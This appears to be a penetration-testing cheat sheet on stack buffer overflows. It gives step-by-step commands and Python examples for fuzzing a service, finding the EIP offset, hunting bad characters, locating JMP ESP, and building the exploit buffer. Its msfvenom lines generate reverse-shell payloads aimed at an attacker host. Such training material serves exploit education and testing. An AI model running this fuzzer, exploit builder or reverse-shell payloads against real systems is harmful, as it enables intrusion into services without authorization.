# Buffer Overflow
* [Cheat Sheet](https://github.com/Tib3rius/Pentest-Cheatsheets/blob/master/exploits/buffer-overflows.rst)
# Usage
* Fuzz the binary roughly first: send an oversized payload and check whether the process crashes
```sh
python -c "print('A' * 3000)"
```
## Fuzzing
* Python 3: `../fuzzer.py`
* Python 2: `../fuzzer2.py`
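The fuzzing step in working code, as an added example (this is not `fuzzer.py` from the repository): the buffer is grown in fixed steps until the service stops answering, and the length at which it died is the starting point for the offset measurement. The target host, port and the `OVERFLOW1 ` command prefix are placeholders, and `simulated_target` is a constructed stand-in so the logic can be run without a vulnerable service.

```python
import socket
import time

# Constructed placeholders: the target service and the command prefix it
# expects are assumptions for this example, not values from the page.
TARGET_HOST = "192.0.2.10"
TARGET_PORT = 1337
PREFIX = b"OVERFLOW1 "


def build_fuzz_buffer(length):
    """The rough crash payload from the page: PREFIX followed by `length` 'A's."""
    return PREFIX + b"A" * length


def send_once(host, port, payload, timeout=5):
    """Deliver one payload to the TCP service; True while it still answers.
    A refused/reset connection or a timeout is reported as False (crash suspected)."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.recv(1024)                  # banner, if the service prints one
            s.sendall(payload + b"\r\n")
            s.recv(1024)                  # the service must still reply
        return True
    except (socket.timeout, ConnectionError, OSError):
        return False


def fuzz(send, start=100, step=100, limit=3000, delay=0.0):
    """Grow the buffer by `step` bytes per round until `send` reports a failure.
    `send` takes the full payload and returns True while the target is alive.
    Returns the first length at which it died, or None if `limit` was reached."""
    length = start
    while length <= limit:
        if not send(build_fuzz_buffer(length)):
            return length
        length += step
        time.sleep(delay)
    return None


def simulated_target(crash_at):
    """Constructed stand-in for a vulnerable service: it 'dies' as soon as the
    data after the prefix is `crash_at` bytes or longer. Lets the fuzzer run offline."""
    def send(payload):
        return len(payload) - len(PREFIX) < crash_at
    return send


if __name__ == "__main__":
    def live(payload):
        return send_once(TARGET_HOST, TARGET_PORT, payload)
    crashed_at = fuzz(live)
    if crashed_at is None:
        print("no crash up to the limit")
    else:
        print("service stopped answering at %d bytes" % crashed_at)
```

The reported length is the upper bound for the pattern in the next step; because the buffer grows in steps of 100 the real overwrite sits somewhere inside the last step, which is exactly what the cyclic pattern resolves.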
## Measure Offset
### Metasploit
* Generate a non-repeating pattern of the crash length and send it as the payload
```sh
/opt/metasploit/tools/exploit/pattern_create.rb -l <bufferlength>
```
* After the crash, take the value shown in EIP and look it up in the pattern; the result is the exact offset of the saved return address
```sh
/opt/metasploit/tools/exploit/pattern_offset.rb -l <bufferlength> -q <EIP-content>
```
### GEF
Inside `gdb` with GEF loaded:
```sh
file <filename>
pattern create <bufferlength>
pattern search <value found in the clobbered register, e.g. $rbx or $rsp>
```
* On a 64-bit binary RIP itself never shows the pattern, because a non-canonical address cannot be loaded by `ret`; search for the value that landed on the stack (`$rsp`) or in a clobbered register such as `$rbx` instead
### Immunity Debugger
* Create the pattern with mona (or with `msf-pattern_create -l <bufferlength>` on Kali) and send it as the payload
```sh
!mona pattern_create <bufferlength>
```
* Look up the EIP value after the crash, either in mona or with the Metasploit wrapper
```sh
!mona pattern_offset <EIP-content>
msf-pattern_offset -l <bufferlength> -q <EIP-content>
```
* Put that offset into the `offset` variable of the exploit `buffer_overflow.py`
../buffer_overflow.py
* Run `buffer_overflow.py`; EIP should now read `42424242` (`BBBB`), which confirms the offset is right
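The whole offset measurement in one runnable piece, as an added example (not `buffer_overflow.py` or the Metasploit scripts themselves): a `pattern_create`-compatible cyclic pattern, the reverse lookup that turns the EIP value into an offset, and the `BBBB` check buffer. `simulate_eip` is a constructed model of the crash (the dword at the offset becomes EIP), so the example runs without a debugger; the offset 1978 is an arbitrary assumed value.

```python
import itertools
import string
import struct


def pattern_create(length):
    """Cyclic pattern with the same layout as Metasploit's pattern_create.rb
    (Aa0Aa1Aa2 ... Aa9Ab0 ...). Every 4-byte window is unique within the first
    20280 bytes, so the dword that lands in EIP identifies its own offset."""
    triplets = ("".join(t) for t in itertools.product(string.ascii_uppercase,
                                                     string.ascii_lowercase,
                                                     string.digits))
    out = bytearray()
    for triplet in itertools.cycle(triplets):    # repeats past 20280 like msf does
        out += triplet.encode()
        if len(out) >= length:
            break
    return bytes(out[:length])


def pattern_offset(pattern, eip):
    """pattern_offset.rb equivalent. `eip` is either the register value as the
    debugger prints it (an int such as 0x6f43396e, i.e. the little-endian reading
    of the 4 bytes that overwrote the return address) or those 4 raw bytes.
    Returns the byte offset of the overwrite, or None if it is not in the pattern."""
    needle = struct.pack("<I", eip) if isinstance(eip, int) else bytes(eip)
    idx = pattern.find(needle)
    return idx if idx >= 0 else None


def simulate_eip(buffer, offset):
    """Constructed model of the crash: the saved return address sits `offset`
    bytes into the buffer, so EIP is loaded with that dword (little-endian)."""
    return struct.unpack("<I", buffer[offset:offset + 4])[0]


def build_eip_check(offset, total):
    """Second stage from the page: junk up to the offset, 'BBBB' for EIP, filler
    after it. EIP must read 0x42424242 on the crash or the offset is wrong."""
    if offset + 4 > total:
        raise ValueError("total buffer too small for offset + 4")
    return b"A" * offset + b"BBBB" + b"C" * (total - offset - 4)


if __name__ == "__main__":
    pattern = pattern_create(3000)
    eip = simulate_eip(pattern, 1978)        # value the debugger would show
    off = pattern_offset(pattern, eip)
    print("EIP=0x%08x -> offset %d" % (eip, off))
    print("check buffer puts 0x%08x into EIP" % simulate_eip(build_eip_check(off, 3000), 1978))
```

Note the byte-order detail hidden in `pattern_offset`: the debugger shows EIP as a number, and on x86 that number is the four pattern bytes read backwards, which is why the int is packed little-endian before searching.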
## Find bad characters to input in the buffer
* Run `bad_chars.py` and include its output as the payload right after the EIP overwrite. `\x00` is always excluded, since it terminates C strings.
../bad_chars.py
* Compare the bytes on the stack with what was sent: any byte that is mangled or cuts the sequence off is a bad character and would break the shellcode in the following steps. Remove one bad character at a time and resend, because the bytes after a real bad character are often corrupted as well.
```sh
!mona bytearray -b "\x00"
!mona compare -f <path_to_bytearray.bin> -a <ESP>
```
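The bad-character hunt as an added example, not the repository's `bad_chars.py` or mona's code: `bytearray_excluding` is the equivalent of `!mona bytearray`, `first_mismatch` of `!mona compare`, and `hunt_bad_chars` runs the iterate-and-resend loop, adding only the first mangled byte per round. `simulated_target` is a constructed input handler (a line feed truncates the input, a carriage return is stored as NUL) that stands in for the debugger memory read.

```python
def bytearray_excluding(bad=b"\x00"):
    """Equivalent of `!mona bytearray -b "<bad>"`: every byte value 0x00-0xff
    except the ones already known to be bad, in ascending order."""
    bad = set(bad)
    return bytes(b for b in range(256) if b not in bad)


def as_c_escapes(data):
    """Render bytes the way buffer_overflow.py / msfvenom -f c write them."""
    return "".join("\\x%02x" % b for b in data)


def first_mismatch(expected, observed):
    """Equivalent of `!mona compare`: walk the bytes that were sent against the
    memory dump at ESP and report the first divergence as (offset, sent, seen).
    `seen` is None when the dump is truncated there. Returns None on a full match."""
    for i, b in enumerate(expected):
        if i >= len(observed):
            return i, b, None
        if observed[i] != b:
            return i, b, observed[i]
    return None


def hunt_bad_chars(send_and_dump, known_bad=b"\x00", max_rounds=64):
    """The page's procedure as a loop: send the array, read memory at ESP, add
    the first mangled byte to the bad list, resend. Only one byte is added per
    round because a real bad char usually corrupts or truncates everything after
    it, so later mismatches cannot be trusted until it is removed."""
    bad = set(known_bad)
    for _ in range(max_rounds):
        probe = bytearray_excluding(bytes(bad))
        mismatch = first_mismatch(probe, send_and_dump(probe))
        if mismatch is None:
            return bytes(sorted(bad))
        bad.add(mismatch[1])
    raise RuntimeError("still finding bad chars after %d rounds" % max_rounds)


def simulated_target(data):
    """Constructed stand-in for the vulnerable input handler (not real code):
    a line feed ends the input and a carriage return is stored as NUL. Returns
    what a debugger would show at ESP after the send."""
    out = bytearray()
    for b in data:
        if b == 0x0a:
            break
        out.append(0x00 if b == 0x0d else b)
    return bytes(out)


if __name__ == "__main__":
    found = hunt_bad_chars(simulated_target)
    print("bad chars:", as_c_escapes(found))
```

Against the simulated handler the loop needs three rounds: the first exposes `\x0a` as a truncation, the second `\x0d` as a substitution, and the third matches cleanly. The resulting list is what goes into `msfvenom -b` later.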
## Find Jump Point / ROP
* An instruction that jumps to `ESP` (`JMP ESP`, 32-bit binary) has to be found in a loaded module and its address placed into `EIP`, so that after the `ret` execution continues on the stack where the shellcode lands
### Example: Immunity Debugger using mona on a Windows machine
* List the loaded modules and pick one without ASLR, DEP/NX, SafeSEH and rebase, whose address range contains no bad characters
```sh
!mona modules
```
* Search that module for a `JMP ESP`
```sh
!mona jmp -r esp -m <exploitable_bin_from_modules>
```
* The address found has to be written **in little-endian byte order** into the EIP variable, since x86/amd64 store the lowest byte first: an address such as `0x625011af` becomes `\xaf\x11\x50\x62`
## Shellcode as Payload
* The last part is the actual shellcode; put it into the payload variable of `buffer_overflow.py`. Pass every bad character found above to `-b` so the encoder avoids them (`\x00` at minimum)
```sh
msfvenom -p windows/shell_reverse_tcp LHOST=<attacker-ip> LPORT=<attacker-port> -f c -e x86/shikata_ga_nai -b "\x00"
msfvenom -p linux/x86/shell_reverse_tcp LHOST=<attacker-ip> LPORT=<attacker-port> -f c -e x86/shikata_ga_nai -b "\x00"
```
* Prepend a NOP sled (`\x90` * 16 or more) before the shellcode: the `shikata_ga_nai` decoder stub uses the stack just below ESP while unpacking and can otherwise overwrite its own bytes
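Assembling the final buffer from the pieces gathered above, as an added example rather than the repository's `buffer_overflow.py`: the offset, the `JMP ESP` address packed little-endian, the NOP sled, and the shellcode parsed out of msfvenom's `-f c` output, with a refusal to build if the address or the shellcode contains a known bad character. The address `0x625011af` is an assumed value, and `MSFVENOM_C_OUTPUT` is a constructed stand-in for the real msfvenom output whose bytes are `INT3` breakpoints, not a reverse shell, so a debugger would simply stop there if the jump worked.

```python
import re
import struct


def parse_c_shellcode(text):
    """Pull the bytes out of msfvenom's `-f c` output (a C string of \\xNN escapes)."""
    return bytes(int(h, 16) for h in re.findall(r"\\x([0-9a-fA-F]{2})", text))


def pack_address(addr):
    """x86/amd64 are little-endian: the address goes into the buffer lowest byte
    first, so 0x625011af is written as b'\\xaf\\x11\\x50\\x62'."""
    return struct.pack("<I", addr)


def bad_chars_in(data, bad):
    """Which of the known bad characters occur in `data` (should be none)."""
    return bytes(sorted({b for b in data if b in bad}))


def build_exploit(offset, jmp_esp, shellcode, bad=b"\x00", nops=16, total=None):
    """Final buffer: [junk * offset][JMP ESP addr][NOP sled][shellcode][filler].
    Refuses to build if the address or the shellcode contains a bad character,
    which would mangle the buffer before it reaches the stack."""
    ret = pack_address(jmp_esp)
    for name, data in (("jmp esp address", ret), ("shellcode", shellcode)):
        hit = bad_chars_in(data, set(bad))
        if hit:
            raise ValueError("%s contains bad chars: %r" % (name, hit))
    payload = b"A" * offset + ret + b"\x90" * nops + shellcode
    if total is not None and len(payload) < total:
        payload += b"C" * (total - len(payload))   # keep the crash length stable
    return payload


def eip_at_crash(buffer, offset):
    """Constructed model of the overwrite: the dword at `offset` becomes EIP."""
    return struct.unpack("<I", buffer[offset:offset + 4])[0]


# Constructed stand-in for `msfvenom ... -f c` output (not real msfvenom output):
# the bytes are INT3 breakpoints, not a payload.
MSFVENOM_C_OUTPUT = '''unsigned char buf[] =
"\\xcc\\xcc\\xcc\\xcc"
"\\xcc\\xcc\\xcc\\xcc";
'''

if __name__ == "__main__":
    sc = parse_c_shellcode(MSFVENOM_C_OUTPUT)
    # offset from the pattern step, address from `!mona jmp` (both assumed here)
    buf = build_exploit(offset=1978, jmp_esp=0x625011af, shellcode=sc, total=3000)
    print("EIP will be 0x%08x, sled starts at offset %d" % (eip_at_crash(buf, 1978), 1982))
```

The bad-character check on the packed address matters as much as the one on the shellcode: an address like `0x00401000` packs to bytes starting with `\x00` and would be truncated by the same string handling that made `\x00` a bad character in the first place.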